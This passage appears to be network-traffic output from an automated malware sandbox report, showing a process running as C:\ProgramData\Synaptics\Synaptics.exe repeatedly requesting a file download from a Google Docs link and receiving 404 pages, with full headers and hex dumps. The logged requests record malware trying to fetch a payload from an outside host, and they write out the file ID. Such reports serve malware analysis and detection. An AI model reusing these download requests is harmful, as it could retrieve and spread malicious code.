                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:30 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-yUUzsv5/pUezuWYaCDayzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:30 UTC29INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 2f 6c 4c 31 68 56 74 76 33 71 59 41 62 72 4a 55 71 31 6d 35 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="K/lL1hVtv3qYAbrJUq1m5g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:30 UTC31INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:30 UTC31INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        90192.168.2.349845142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:40 UTC272OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:40 UTC275INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:40 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-rAOCuEYSNe/jrXMcD3QziA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:40 UTC276INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 79 68 54 4a 61 72 71 5a 44 4b 6c 6d 6e 74 2f 33 30 5a 70 69 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jyhTJarqZDKlmnt/30ZpiA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:40 UTC278INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:40 UTC278INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        91192.168.2.349846142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:40 UTC275OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:41 UTC278INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:41 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-iRqu9Dt5DRTUWTGw/qCBQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:41 UTC280INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 6d 76 66 35 2f 4f 70 6c 72 42 41 2f 54 4b 43 51 4a 54 33 54 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8mvf5/OplrBA/TKCQJT3Tw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:41 UTC281INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:41 UTC281INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        92192.168.2.349847142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:41 UTC278OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:41 UTC281INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:41 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-S8Im4p2qhErMgPnjNkBv6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:41 UTC283INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:41 UTC283INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 6a 57 2b 53 38 4b 73 4a 73 71 48 51 4d 73 51 49 43 4f 77 52 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GjW+S8KsJsqHQMsQICOwRA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:41 UTC284INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:41 UTC284INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        93192.168.2.349848142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:41 UTC281OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:41 UTC284INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:41 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-E7q9Oar21v4uI1qY9bHFMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:41 UTC286INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 79 32 6e 77 35 71 4c 56 77 62 53 5a 31 43 6c 32 50 76 68 69 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iy2nw5qLVwbSZ1Cl2Pvhiw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:41 UTC287INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:41 UTC287INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        94192.168.2.349849142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:41 UTC284OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:41 UTC288INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:41 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-rfaBey0/uohARUjZJCXGRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
